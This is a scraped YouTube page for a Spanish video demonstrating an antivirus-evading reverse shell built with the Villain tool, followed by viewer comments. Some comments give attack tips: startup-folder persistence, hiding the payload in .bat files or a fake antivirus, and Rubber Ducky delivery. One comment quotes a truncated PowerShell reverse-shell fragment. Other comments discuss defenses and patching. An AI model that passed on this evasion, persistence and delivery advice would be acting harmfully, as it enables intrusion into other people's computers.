👉 VILLAIN | Generar una BACKDOOR INDETECTABLE para el ANTIVIRUS | Así de FÁCIL TE HACKEAN 🔴

  Рет қаралды 28,780

El Pingüino de Mario

El Pingüino de Mario

Күн бұрын

Este es un vídeo muy importante y de urgencia, ya que hemos utilizado una herramienta que es capaz de obtener una reverse shell de una máquina Windows con todo actualizado y activado, de tal forma que es capaz de eludir el antivirus Windows Defender a través de ofuscar el Payload.
Por este motivo, es realmente importante mantener ciertas medidas de seguridad en nuestro sistema para evitar este tipo de ataques, ya que no siempre es suficiente con tener el antivirus actualizado, sino que también es necesario que conozcamos este tipo de vulnerabilidades para no descargar ni ejecutar software sospechoso.
Utilizaremos una herramienta que se llama villain, la cual nos genera el payload ofuscado para ejecutarlo en máquinas Windows o Linux de una forma muy fácil, donde podremos obtener una reverse shell de la máquina objetivo.
#ciberseguridad #hackingetico #villain #kalilinux
✅ Canal de Telegram: t.me/elpinguin...
⚠️ ATENCIÓN: Este vídeo ha sido creado exclusivamente con fines educativos, todas las demostraciones son realizadas dentro de entornos controlados que han sido creados para realizar estas pruebas sin afectar a nadie. En ningún momento se fomenta el uso inadecuado de estas técnicas.

Пікірлер: 147
@ElPinguinoDeMario
@ElPinguinoDeMario 4 ай бұрын
🚀 Aprende ciberseguridad y hacking ético desde cero con nuestra academia El Rincón del Hacker!! elrincondelhacker.es 🎓 Curso Preparación eJPT: elrincondelhacker.es/courses/preparacion-certificacion-ejptv2/ 🎓 Curso de Linux y Bash Scripting: elrincondelhacker.es/courses/curso-de-linux-y-bash-scripting/ 🎓 Curso de Docker: elrincondelhacker.es/courses/curso-de-docker/ Hosting que recomiendo: raiolanetworks.com/landing/hosting-elpinguinodemario/
@javibelenguer
@javibelenguer Жыл бұрын
Eres un crack y de los buenos, esa shell te deja hacer keylogger en la máquina víctima, piensa algo de keylogger por mail o ngrok. Recomiendo Saint. Gracias
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Muchas gracias por el apoyo!! 😁
@andricordobamoo1690
@andricordobamoo1690 Жыл бұрын
Me preguntó si algunas bases de datos de antivirus ya están actualizadas para este tipo de payloads, ya había investigado algo sobre la herramienta pero no la había visto en acción, excelente información Mario
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Sería cuestión de investigar, aunque pocos antivirus creo que estén actualizados para esto de momento, es cuestión de esperar hasta que se actualicen
@AnimashDaje
@AnimashDaje Жыл бұрын
@@ElPinguinoDeMario ya esta ree parcheado xd
@gustavomanyoma2557
@gustavomanyoma2557 11 ай бұрын
Siii?
@zebus3d
@zebus3d Жыл бұрын
¿Y si por algún casual te lo hicieran?, Con algún sniffer se podría detectar esa conexión remota?, Estaría bien aprender más a interpretar lo que sale en los sniffers para detectar este tipo de ataques. ¿No existen herramientas que usen en realtime algún sniffer para hacer detecciones de anomalías en tu red al vuelo?. Un saludo y felicidades por el canal!
@victorchoquehuanca2306
@victorchoquehuanca2306 4 ай бұрын
yo creo que podrias hacerlo, con wireshark, pero es una herramienta muy general y tendrian que tener conocimientos en redes para poder detectar, no se si habran herramientas mas automatizadas
@cybersecuritysam
@cybersecuritysam Жыл бұрын
Excelente video, es una herramienta bastante interesante!....
@clinicaabril
@clinicaabril Жыл бұрын
Gracias Master por estas clases tan interesantes....
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Muchas gracias!! 😁
@clinicaabril
@clinicaabril Жыл бұрын
@@ElPinguinoDeMario A ti Makina....
@paltwitch6431
@paltwitch6431 Жыл бұрын
Buenas Mario, me encantan tus vídeos. Quisiera hacerte una pregunta, cómo consigues actualizarte en este tema, por ejemplo como te has enterado de que ha salido este payload o que por ejemplo lo han actualizado. Gracias y sigue así que me tienes enganchado a tus vídeos.
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Muchísimas gracias por el apoyo!!! Se agradece un montón jeje en cuanto a la pregunta, en el ejemplo de este vídeo me enteré gracias a un seguidor que me lo dijo en el grupo de Telegram, pero en general no hago nada en especial para mantenerme actualizado, simplemente trato de aprender algo nuevo cada día y de esa forma me mantengo actualizado y mejoro constantemente 💪🏻💪🏻
@tonymantruck8511
@tonymantruck8511 Жыл бұрын
Excelente video muy pronto lo pondré a prueba
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Muchas gracias!! Ahora el defender ya se actualizo, pero quitando eso sigue funcionando 😁
@hectorrewardd2737
@hectorrewardd2737 Жыл бұрын
Este canal vale oro!
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Muchas gracias!! Se agradece mucho el apoyo 💪🏻
@fabriciozetaquiroga7912
@fabriciozetaquiroga7912 2 ай бұрын
seria bueno que lo pruebes en una pc de alguna persona que este lejos porque para eso es otro metodo que explica en el video del creador de villain
@Martin_RGB
@Martin_RGB 2 ай бұрын
debe estar en la misma red no?
@raonpe
@raonpe Жыл бұрын
Herramientas como éstas hay a patadas y a las pocas semanas de publicarse, sus firmas de detección (hashes, fuzzy hashes, reglas yara, etc) son publicadas y son detectadas enseguida. Así es la historia de las herramientas de evasión ;) Afortunadamente los fabricante de antimalware (incluyendo Microsoft con Defender) hacen los deberes aunque cada vez lo tienen más difícil. Por eso las soluciones tradicionales basadas en firmas no sirven en organizaciones objetivo de ataques: tienen que usar EDR, XDR, NDR, etc y todo este tipo de soluciones que además analizan comportamiento, utilizan IA, fuentes de inteligencia, análisis de sandbox en la nube, etc porque no es suficiente con las firmas. Saludos
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Exacto!! Por eso esta genial mostrar la existencia de estas herramientas para concienciarnos de lo fácil que es que lleguemos a ser hackeados 😁💪🏻
@erwingodoy9511
@erwingodoy9511 Жыл бұрын
Siempre es más recomendable diseñar un código propio en Python para hacer esto. Gracias mario
@carlosastete4290
@carlosastete4290 11 ай бұрын
actualmente no funciona el metodo :(
@ciroenrique5285
@ciroenrique5285 10 ай бұрын
Hice un malware en python pero no se como evitar el windows defender@@carlosastete4290
@visionawka1528
@visionawka1528 Жыл бұрын
Gracias gran aporte
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Muchas gracias por el apoyo!!!
@gerardopacheco9521
@gerardopacheco9521 Жыл бұрын
muchas gracias!!!
@cesarramos4065
@cesarramos4065 19 күн бұрын
Lo que da temor de estas herramientas ya creadas es que si ya tienen potencial en su labor, imagina si al creador le da por hacer el hack a través de su herramienta para la gente que la descargue e utilice, yo al menos hasta que no vea como funciona ese .py no lo ejecutaría. No quito ningún mérito pero me gusta tener mil ojos.
@juanpcely1417
@juanpcely1417 Жыл бұрын
ya no funciona lo detecta como script malicioso al momento de ingresar el payload :(
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Sii exacto, con el tiempo lo han corregido aunque puede seguir siendo útil para equipos desactualizados 👍🏻
@rrg7289
@rrg7289 Жыл бұрын
Qué facil es que nos puedan hackear!, Hay que tener cuidado con lo que recibimos por correo, por whatsapp web, o cualquier medio. Una pregunta El Pinguino de Mario, este payload se puede esconder en cualquier archivo, ya que si vemos un comando con mucho texto "raro", optariamos por no hacer nada y borrarlo, pero supongo que gente malintencionada podria esconder todo ese codigo en algun fichero. Como se podria hacer eso, digo para fines educativos. ya que en otro de tus videos se pudo esconder otro payload en un PDF. Y por ultimo, ningun antivirus es capaz de detectarlo? Tambien funciona en Celulares?. Un saludos y contenido muy interesante y educativo.
@EstebanInojosa-jz7eu
@EstebanInojosa-jz7eu 3 ай бұрын
Haces un bat luego lo escondes como viste en el caso del PDF
@ChapuBrah
@ChapuBrah Жыл бұрын
Bro hay alguna manera de meterle ese comando, y ajuntarlo con un programa .exe? Para que cuando lo descarguen y lo instalen te bote le shell?
@wahbi1579
@wahbi1579 Жыл бұрын
I want to know
@club.reto.urbano
@club.reto.urbano 10 ай бұрын
amigo cómo estas excelente video, instale vitual box y luego kali linx en virtual box, no entiendo porque no logro ver la barra de tareas. que puedo hacer, gracias de antemano
@silofiilofli4543
@silofiilofli4543 Жыл бұрын
buen vídeo!!! esta herramienta funciona para Android ??🤔🤔🤔 para móvil? si no funciona estaría bien alguna como esta para móviles gracias!!🎅🎅💪💪👍
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola! En este caso para móvil no funcionaría ya que está hecha para atacar Linux o Windows , para Android hay un módulo de msfvenom que nos permite crear una apk infectada y ganar acceso remoto a Android 👍🏻
@blacksaturn3839
@blacksaturn3839 9 ай бұрын
Lo han parchao, ahora si lo detecta :(
@raulgabrielhacho9231
@raulgabrielhacho9231 Жыл бұрын
en caso mio no funciona por mas que desactivo los antivirus. me vota el mensaje acceso denegado.. aun asi si lo ejecuto en una cmd como administrador
@huangfuhaoyue626
@huangfuhaoyue626 Жыл бұрын
Nada mas empezar el video se me encogio el qlo.
@rap.underground
@rap.underground 7 ай бұрын
pero solo el antivirus de windows no detecta eso o tambien ningun otro antivirus??
@javaboy6581
@javaboy6581 Жыл бұрын
Muy bueno pinguino, hay muchas herramientas asi y es sencillo de crear estos rats, lo suyo seria que viniesen con 0 days para escalar privilegios xD
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Exacto! Aunque ya con el simple hecho de poder acceder a una máquina de forma tan fácil es increíble 😱
@Elcrack158
@Elcrack158 8 ай бұрын
hola bro quisiera hacerte una pregunta, y si genero ese codigo lo guardo y apago mi pc y la vuelvo a encender y pongo ese codigo en una maquina windows, como vuelvo a donde estaba antes en kali linux
@Cornieles_16
@Cornieles_16 7 ай бұрын
Si lo creas en una Máquina Virtual puedes suspenderla
@drgold1239
@drgold1239 Жыл бұрын
okay pero para para que funcione se la persona tiene que ejecutarlo en su terminal ?
@edgarhernanmaidana7141
@edgarhernanmaidana7141 3 ай бұрын
hola mario. al ahora de ejecutar python3 Villain.py me sale una cantidad de cosas a lo ultimo dice ModuleNotFoundError: No module named 'netifaces' .. sabes que puede ser?
@unastar
@unastar 2 ай бұрын
pip3 install netifaces
@edgarhernanmaidana7141
@edgarhernanmaidana7141 2 ай бұрын
@@unastar gracias colega
@lucasmanuel7807
@lucasmanuel7807 10 ай бұрын
En el minuto 1:24 se puede observar como se le salen los colmillos a Mario
@kelvinrodriguez4569
@kelvinrodriguez4569 9 ай бұрын
saludos mi amigo---- pero ya el antivirus defender lo bloquea.... tengo windows 10 actualizado ... fecha de la penetracion 26/11/2023
@onedayapp3534
@onedayapp3534 Жыл бұрын
es solo en local?
@rabeeh7882
@rabeeh7882 Жыл бұрын
ya esta capado, podria haber otro backdoor indetectable?
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Lo han capado efectivamente, habría que mirar nuevas herramientas, de todos modos esta es muy útil para Windows desactualizados 🤷🏻‍♂️
@diegoalejandroh6139
@diegoalejandroh6139 7 ай бұрын
consulta, tiene persistencia? osea se guardan las victimas al momento de realizar esto, recuerdo que ocupaba turkojan y cada vez que reinicaban el pc me volvian a aparecer las victimas en una fila con su ip gracias.
@ΨΜΒ
@ΨΜΒ 3 ай бұрын
tiene?
@gerardopacheco9521
@gerardopacheco9521 Жыл бұрын
hola algun curso de linux que recomiendes?? saludos
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola!! Te recomiendo instalar Linux en tu ordenador e ir aprendiendo día a día, como instalar programas, eliminar, comandos, etc 👍🏻
@pitagoricofenixzone5508
@pitagoricofenixzone5508 Жыл бұрын
Amigo de dónde mantienes actualizado de toda esta información? sirve para equipos fuera del lan?
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola!! Es difícil mantenerse siempre 100% actualizado, pero la clave es aprender a entender el funcionamiento del Hacking y todo lo que ello conlleva, y así es muy fácil actualizarse con lo que vayas necesitando 👍🏻
@bronthebeats5673
@bronthebeats5673 11 ай бұрын
funciona fuera de la red local?
@gabrielaranda2238
@gabrielaranda2238 Жыл бұрын
como son los comandos para poder descargar los archivos?
@L-God369
@L-God369 10 ай бұрын
pero ese peiloc se puede hacer auto ejectutable
@EnriqueMartinez-ul5uk
@EnriqueMartinez-ul5uk Жыл бұрын
Me apareció un mensaje en la consola que dice " Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus", que solución tendría eso?
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola!! el Windows defender se actualizo y a día de hoy ya no es vulnerable 🤷🏻‍♂️
@Learningtoplayguitartogether
@Learningtoplayguitartogether 10 ай бұрын
mi pregunta sería, si alguien accede a tu pc, como se podría liberar uno de esto? Me lo han hecho y no se como actuar, con pasar en modo seguro algun anti malware y formatear es suficiente?
@ImSkiiLzz
@ImSkiiLzz 3 ай бұрын
Me paso, lo pudiste solucionar amigo?
@mgamer-vm9xc
@mgamer-vm9xc Жыл бұрын
si cierran la powershell se apaga la shellreversa o se mantiene para siempre
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola!! Creo que se cerraría 💪🏻
@williamspsocik5051
@williamspsocik5051 11 ай бұрын
A mi me funcionaba la volvi a probar y no hace nada jajajajaja.
@marlonisraelacostaporras3611
@marlonisraelacostaporras3611 Жыл бұрын
EXCELENTE VÍDEO SALUDOS DESDE ECUADOR , como le harías para camuflar ese código y que la victima lo ejecute _
@AnimashDaje
@AnimashDaje Жыл бұрын
ya lo parchearon
@ZenaNoob69
@ZenaNoob69 Жыл бұрын
Una pregunta, ¿Esto es fuera de la lan? Gracias.
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola!! En el vídeo es dentro de la lan, aunque podría funcionar fuera también 👍🏻
@gabrielacosta02
@gabrielacosta02 5 ай бұрын
No funciona con kali Ubuntu
@Elnoobdelinux
@Elnoobdelinux Жыл бұрын
Bro has un videos de backdoor fuera de la lan
@sergioramos-gv9ob
@sergioramos-gv9ob Жыл бұрын
También se puede aplicar en Ubuntu o solo es para kali?
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola!! En este caso se aplica para cualquier sistema Linux 👍🏻
@maycolsosaruiz4887
@maycolsosaruiz4887 5 ай бұрын
4:05 ayuda me aparece "required argument payload not supplied" que hago :(
@rk5.denvali
@rk5.denvali 24 күн бұрын
ya lo arreglaste? se la solucion
@juanvalcecchi3464
@juanvalcecchi3464 8 күн бұрын
Uatt
@Orco256
@Orco256 2 ай бұрын
no entiendo que sentido tiene esto si no nos va a decir como protegernos. despues de todo el usuario victima tiene que ejecutar tu codigo generado en una terminal, asique la manera mas segura de protegerse es no andar en cosas raras. cualquier programa de tercero no firmado podria ejecutarte ese codigo y convertirte en victima. gracias a cosas como estas toda la gente optara por pagar en microsoft store por sus programas y juegos en steam o epic games. fuentes oficiales. se termina la livertad para usuarios de escritorio
@chris351
@chris351 Жыл бұрын
Tengo tinywall y solo le doy permisos de salida a navegador y 5 programas el resto lo bloqueo todo, igual me puede hackear con esa herramienta?
@gguestdub3518
@gguestdub3518 10 ай бұрын
Muy bueno, y respecto a tu pregunta ovbiamenre ya no podrian ya que estas aplicando basicamente lo que es zero trust en terminos de ciberseguridad (filtros de firewall) muy bueno el uso de tiny wall me sorprende asi deberian ser todos pero tendrias que tener conocimiento, yo uso otro aplicativo que funciona como lista negra y blanca y gris y asi nos aseguramos mejor, solo que para que el sistema llegue a funcionar bien como cualquier otro tenes que dar el correcto permisos a distinto servicios, (y) saludos
@martabermudez2189
@martabermudez2189 Жыл бұрын
😊
@samuelroman4514
@samuelroman4514 Жыл бұрын
Quiero hacer un pentest para mis celulares iOS y android. Puedes hacer un tutorial de eso ? Es lo que me falta por aprender. Quiero decir tener acceso remoto ver archivos ect
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Hola!! En mi caso tengo muy pocos conocimientos de hacking en teléfonos 🤷🏻‍♂️
@samuelroman4514
@samuelroman4514 Жыл бұрын
@@ElPinguinoDeMario entendido Gracias de todos modos Para mi usted sabe muchísimo 🙏🏿
@lunaticklunaticklunatick
@lunaticklunaticklunatick Жыл бұрын
funciona para android ?
@lucascaskajillo540
@lucascaskajillo540 Жыл бұрын
Vaya miedo, madre mía
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
La verdad que si!! Pero esta bien conocer este tipo de riesgos para protegernos 👍🏻
@bambam56
@bambam56 11 ай бұрын
para fuera de internet hay que poner ip publica no?
@Orco256
@Orco256 2 ай бұрын
no se entiende tu pregunta. lo que es fuera de internet es local. tu ip publica es visible por otros de pende a donde te conectes si te conectas a youtube, este vera tu ip publica pero si tenes un servidor de lo que sea, cuando se conecten a vos, veras sus ip publica. fuera de internet osea la local te la da tu router y la publica te la da tu proovedor de internet. incluso a veces no tenes la posibilidad de cambiar tu ip publica. asique la publica es de internet y la privada es la local.
@diegootaku8281
@diegootaku8281 Жыл бұрын
Ya lo detecta el antivirus, buenas tardes
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Sii exacto 🤷🏻‍♂️
@greatplayer2221
@greatplayer2221 23 күн бұрын
jeje mi antivirus si lo detectó
@Alfonso-Rivera-Quispe
@Alfonso-Rivera-Quispe Жыл бұрын
Estos triste, ya no funciona, tenia proyectos con esta herramienta 🙁🙁
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Fue bonito mientras duro, aunque quizá actualizan la herramienta 🤷🏻‍♂️
@rk5.denvali
@rk5.denvali 24 күн бұрын
ya lo detecta gente
@elhombrenegro1129
@elhombrenegro1129 Жыл бұрын
Como creo una persistencia con ese backdoor que subiste?
@AnimashDaje
@AnimashDaje Жыл бұрын
bro si lo encuentras comparte porfa
@EstebanInojosa-jz7eu
@EstebanInojosa-jz7eu 3 ай бұрын
​@@AnimashDaje en windows existe un directorio que todo lo que allí agregues se ejecuta en cada inicio. Tecla Windows + R : shell:startup Si logras colarte una vez, llega hasta el directorio que te indique y planta allí el payload así puedes ganar acceso en el próximo reinicio (solo tendrías que estar sniffeando constantemente para lograr el acceso) lo he probado con otros métodos de shell reverse y funciona
@chupete1011
@chupete1011 Жыл бұрын
Estaba pensando que ejecutando esto desde un USB tipo Ruber Ducky o Bad USB, lias la de Dios, por ejemplo un ordenador del trabajo, un banco al que se lo puedas conectar con ingeniería social, u otros ejemplos..... aunque sería más peligroso con un rat, que con un simple payload.
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Exacto!! Por eso esta bien mostrarlo porque son herramientas con mucho potencial y tenemos que tener cuidado 🤷🏻‍♂️
@chupete1011
@chupete1011 Жыл бұрын
Mario, venga te expongo un reto y a ver si tienes web0s de hacer un vídeo 😉 Déjate de tanto Kali Linux que parece que no hay otra cosa. Y haz un vídeo hackeando un Windows desde otro Windows sin que te lo detecte ningún antivirus. Venga, que es súper fácil. Desde dentro de la red o fuera de la red con ngrok que sabes que es sencillo. Cómo quieras, pero sin usar el clásico netcat que te lo detecta cualquier antivirus a la más mínima. Venga y así muestras tus dotes de obfuscador.
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
@@chupete1011 jaja es un buen reto, diría de hacerlo todo con Python, por ejemplo tengo este vídeo que más o menos lo consigo: 🔴 HACKING ÉTICO - Cómo Obtener REVERSE SHELL con PYTHON | INDETECTABLE por el ANTIVIRUS 🐍 kzbin.info/www/bejne/jIWafqqbbchpe8U Aunque estoy preparando más vídeos con la librería pwntools de Python para hacer más Hacking ético con Python y eso se puede lanzar desde Windows 😁
@chupete1011
@chupete1011 Жыл бұрын
Bueno usa Python para hacer un script que codifique un troyano por ejemplo y luego lo lanzas desde un bat con comandos de powershell y es bastante efectivo. Y en el vídeo que dices usas Python pero no sólo en la vida todo es Python, aunque con Python puedes crear el payload, el obfuscador, y luego ya solo es generar el bat para ejecutarlo desde powershell.
@marlonisraelacostaporras3611
@marlonisraelacostaporras3611 Жыл бұрын
que método usarias para ejecutar esto desde una rubber ducky ?
@onsitesalzitahx
@onsitesalzitahx Жыл бұрын
Justo hoy instale un juego por mediafire y justo un segundo después de que descomprimí el juego me salto una notificación de dos troyanos, uno que se llamaba “Backdoor” y el otro que se llama “Bladabindi”, si fuera verdad que ese archivo .rar tenía esos dos troyanos ps me jodí, me gustaría saber como des hacerme de ellos, aunque en este PC no tengo nada importante que puedan hackear
@gatras1540
@gatras1540 Жыл бұрын
pueden mirar tus camaras, tu microfono, eliminar y poner archivos en tu computador y aparte pueden hacer ataques con tu pc y dejandolo como si fueras tu
@onsitesalzitahx
@onsitesalzitahx Жыл бұрын
@@gatras1540 diablo loco, wazaaa👻👻👻, ok ya hablando en serio, what, y no hay forma de zafarse de eso?
@mauriciopinto2669
@mauriciopinto2669 Жыл бұрын
@@onsitesalzitahx formatear el pc y aprender la lección, "Lo gratis sale caro después" .
@onsitesalzitahx
@onsitesalzitahx Жыл бұрын
@@mauriciopinto2669 Noooo KAJAJSJAKJA que vrg, bueno, igual gracias
@gatras1540
@gatras1540 Жыл бұрын
@@onsitesalzitahx es verdad lo que dice mauricio, si no lo haces y si es un ataque o un profesional, lo puede hacer sin que te des de cuenta y extorsionarte, es mejor que la formatees si no lo haces corre tu el riesgo...
@__Oldboy__
@__Oldboy__ Жыл бұрын
Y luego como podrias acceder desde una red externa?, porque seguramente has hecho esta demostracion en dos SO pero que estan conectados a tu misma red. Como harías para ejecutar esa revershell desde una red externa?, por ejemplo, estando tu conectado desde casa y el otro dispositivo estuviera en una bibilioteca?..
@AnimashDaje
@AnimashDaje Жыл бұрын
eso ya nos toca a nosotro 👌
@blancaestelaromeromuñiz
@blancaestelaromeromuñiz Жыл бұрын
Prefiero la ofuscacion manual
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Es lo ideal claramente 🤷🏻‍♂️
@comentator6489
@comentator6489 Жыл бұрын
ya lo parcharon ;(
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Sii exacto, aunque sigue siendo una herramienta útil 💪🏻
@dzpazor0
@dzpazor0 9 ай бұрын
te doxeaste?
@danielvazquezromero4691
@danielvazquezromero4691 Жыл бұрын
Ya no funciona
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Exacto, ya fue parcheado, aunque aún así es muy útil para poder utilizarlo en versiones desactualizadas 👍🏻
@LilithRodríguez-o7i
@LilithRodríguez-o7i Ай бұрын
SI FINES ETICOS :V
@Alvark123
@Alvark123 7 ай бұрын
Los de Microsoft ya lo habrán parcheado
@wrenchproductions
@wrenchproductions 4 ай бұрын
Ya está parcheadisimo
@Goetia205
@Goetia205 Жыл бұрын
Parcheado
@fpsllordd4rk921
@fpsllordd4rk921 Жыл бұрын
Que bueno saberlo para tratar de erradicar esa payload, ahora creo que si se hace un bat y se manda vía correo a víctima se crea conexión. Pero no modo persistente
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Exacto!! La verdad que es un peligro, veremos si lo parchean y se actualiza el defender, para este tipo de métodos suelen funcionar un tiempo hasta que se actualiza el sistema
@lucascaskajillo540
@lucascaskajillo540 Жыл бұрын
Se puede hacer, y además si lo cifras y lo pones en tipo ejecutable y lo copias a la carpeta de inicio entonces si que es persistente
@fpsllordd4rk921
@fpsllordd4rk921 Жыл бұрын
@@lucascaskajillo540 claro quedar en segundo plano, estoy consciente en eso enmascarer el código malicioso, con un técnica de ingeniería social o phishin,
@lucascaskajillo540
@lucascaskajillo540 Жыл бұрын
@@fpsllordd4rk921 Exactamente, lo ocultas en un programa, o peor aún en un Antivirus, y ahí tienes el protector Antivirus y el Payload indetectable de antivirus usando la técnica del Phising
@fpsllordd4rk921
@fpsllordd4rk921 Жыл бұрын
@@lucascaskajillo540 tecnica de evacion de firewall, antivirus con esta herramienta
@kendalldg7632
@kendalldg7632 Жыл бұрын
Lo intente hoy 24 julio de 2023 desde mi maquina virtual Linux a una laptop con Windows 11 Home y Powershell bloquea el comando con el siguiente mensaje: En línea: 1 Carácter: 1 + Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent
@kendalldg7632
@kendalldg7632 Жыл бұрын
Alguien sabe como ocultarlo para que el Antivirus No lo detecte? o algún foro de hacking ético que me recomeinden para solucionar este tipo de dudas?
@AnimashDaje
@AnimashDaje Жыл бұрын
ya fue parcheado@@kendalldg7632
@danielrodriguez5960
@danielrodriguez5960 Жыл бұрын
Esta re detectado
@ElPinguinoDeMario
@ElPinguinoDeMario Жыл бұрын
Sii solo fue válido durante unos días 🤷🏻‍♂️
catch EVERY reverse shell while hacking! (VILLAIN)
19:03
John Hammond
Рет қаралды 221 М.
👉🏻 Aprende a Utilizar METASPLOIT Desde Cero en Menos de 30 Minutos 🥷🏻
27:21
HACKING ETICO [Vulnerando un dispositivo Android] (Para fines educativos)
16:58
Como Eliminar Virus de Tu PC con CMD | RESUELTO |
13:12
PC fácil Digital
Рет қаралды 2,1 МЛН
MiTM Hacking | Ataques de hombre en el medio | Ettercap
17:27
SEGURIDAD CERO
Рет қаралды 35 М.